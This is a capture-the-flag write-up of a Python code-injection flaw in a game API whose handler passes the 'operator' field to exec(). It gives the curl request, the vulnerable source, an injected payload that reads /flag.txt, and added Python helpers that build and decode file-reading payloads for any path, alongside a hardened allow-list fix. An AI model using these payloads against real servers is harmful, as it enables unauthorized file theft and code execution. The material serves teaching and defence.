Evaluation Deck

Target Information

  • IP: 157.245.42.104:31254
  • Game application with public API at http://157.245.42.104:31254/api/get_health
    • Can interface with it via curl:
      curl -X POST -H "Content-Type: application/json" -d '{"attack_power":"90","current_health":"100","operator":"+"}' http://157.245.42.104:31254/api/get_health
      
  • Running Docker

Exploitation

  • Opened the application in the Burp Suite proxy and sent a request to the API:

    {
      "attack_power": "90",
      "current_health": "100",
      "operator": "+"
    }
    

    The response was:

    {
      "message": "190"
    }
    

    The server returned the arithmetic result of the two operands joined by the operator, which suggests the request body is being evaluated as a Python expression on the server. The source confirms it: this is a code injection vulnerability (not a server-side request forgery).

    The following lines in routes.py show why. current_health and attack_power are cast with int(), but operator is interpolated into Python source unsanitized and executed:

    # only the two operands are cast; operator goes into the source string verbatim
    code = compile(f'result = {int(current_health)} {operator} {int(attack_power)}', '<string>', 'exec')
    exec(code, result)
    return response(result.get('result'))
    
  • Used the injection to read the flag from the container's filesystem. Both numeric operands are set to 0 so the injected expression is the whole result; the file contents are exfiltrated as the concatenated decimal ord() values of its characters, since the endpoint only returns an integer:

    {
      "attack_power": "0",
      "current_health": "0",
      "operator": "+ int(''.join([str(ord(x)) for x in list(open('/flag.txt').read())])) +"
    }
    

    The response was:

    {
      "message": 728466123994810051954911010651991164948110115955211451957111451971163333125
    }
    

    I converted this number from the Python ord positions of the flag to ASCII to get the flag:

    HTB{c0d3_1nj3ct10ns_4r3_Gr3at!!}
    
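The write-up above shows the injection and the decoding step by hand. The block below is an added example, not code from the challenge: it reproduces the compile()/exec() logic from routes.py as a plain function (the surrounding Flask route is not on the page, so it is modelled without the request/response wrapper), puts a hardened version next to it that maps the operator through an allow-list instead of evaluating source, and adds helpers that build the ord-digit payload for any path and decode the resulting integer. The hex-encoded variant is an alternative I added, not the technique the write-up used. The flag file and its contents are constructed so the example runs offline.

```python
"""Added example (not the challenge's own code): the vulnerable handler from
routes.py modelled as a function, a hardened replacement, and helpers to
build and decode the ord-digit exfiltration payload used in the write-up.

Assumptions: the Flask route around the snippet is not on the page, so the
handler body is a plain function; the flag path is a parameter so the demo
can run against a constructed temporary file instead of /flag.txt.
"""
import operator as op
import os
import tempfile


def vulnerable_get_health(attack_power, current_health, operator):
    """Mirrors the compile()/exec() logic shown in routes.py.

    Only the two numeric operands are cast with int(); the operator string is
    spliced into Python source verbatim, so any expression fragment runs with
    the server's privileges."""
    result = {}
    code = compile(f'result = {int(current_health)} {operator} {int(attack_power)}',
                   '<string>', 'exec')
    exec(code, result)
    return result.get('result')


# Hardened form: look the operator up in an allow-list; nothing is evaluated.
ALLOWED_OPERATORS = {
    '+': op.add,
    '-': op.sub,
    '*': op.mul,
}


def safe_get_health(attack_power, current_health, operator):
    """Reject any operator outside the allow-list instead of executing it."""
    fn = ALLOWED_OPERATORS.get(operator)
    if fn is None:
        raise ValueError(f'unsupported operator: {operator!r}')
    return fn(int(current_health), int(attack_power))


def build_ord_payload(path):
    """Operator string that leaks a file as concatenated decimal ord() values
    (the technique from the write-up); valid when both operands are 0."""
    return f"+ int(''.join([str(ord(x)) for x in open({path!r}).read()])) +"


def decode_ord_digits(n):
    """Recover text from concatenated decimal ord() values.

    For printable ASCII the split is unambiguous: 2-digit codes (32..99)
    start with 3-9 and 3-digit codes (100..126) start with 1. A control
    character such as a trailing newline (ord 10) would break this, which is
    one reason to prefer the hex variant below."""
    digits = str(n)
    out, i = [], 0
    while i < len(digits):
        width = 3 if digits[i] == '1' else 2
        code = int(digits[i:i + width])
        if not 32 <= code <= 126:
            raise ValueError(f'non-printable code {code} at offset {i}')
        out.append(chr(code))
        i += width
    return ''.join(out)


def build_hex_payload(path):
    """Alternative I added: encode the raw bytes as one hex integer, so any
    byte value survives and decoding needs no guessing about digit widths."""
    return f"+ int(open({path!r}, 'rb').read().hex(), 16) +"


def decode_hex_int(n):
    """Inverse of build_hex_payload (a leading 0x00 byte would be lost,
    which does not matter for a text flag)."""
    h = f'{n:x}'
    if len(h) % 2:
        h = '0' + h
    return bytes.fromhex(h).decode()


def demo(flag_text='HTB{constructed_flag_for_demo}'):
    """Round trip: plant a constructed flag file, leak it through the
    vulnerable handler both ways, and decode. Returns (ord_text, hex_text)."""
    with tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False) as f:
        f.write(flag_text)
        path = f.name
    try:
        n_ord = vulnerable_get_health('0', '0', build_ord_payload(path))
        n_hex = vulnerable_get_health('0', '0', build_hex_payload(path))
        return decode_ord_digits(n_ord), decode_hex_int(n_hex)
    finally:
        os.unlink(path)


if __name__ == '__main__':
    print(vulnerable_get_health('90', '100', '+'))
    print(demo())
    # the integer returned by the real target, decoded
    print(decode_ord_digits(728466123994810051954911010651991164948110115955211451957111451971163333125))
```

The hardened handler keeps the game's arithmetic working while removing the exec() path entirely; if the operator set ever needs to grow, it grows as dictionary entries, not as evaluated strings.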

Final Thoughts

A complete write-up of this challenge can be found on Medium, please check it out and show your support by leaving some claps and sharing it with your friends!

The files for this challenge can be found in the assets folder if you would like to try it out for yourself.


Tags

  1. hackthebox
  2. web
  3. code-injection
  4. python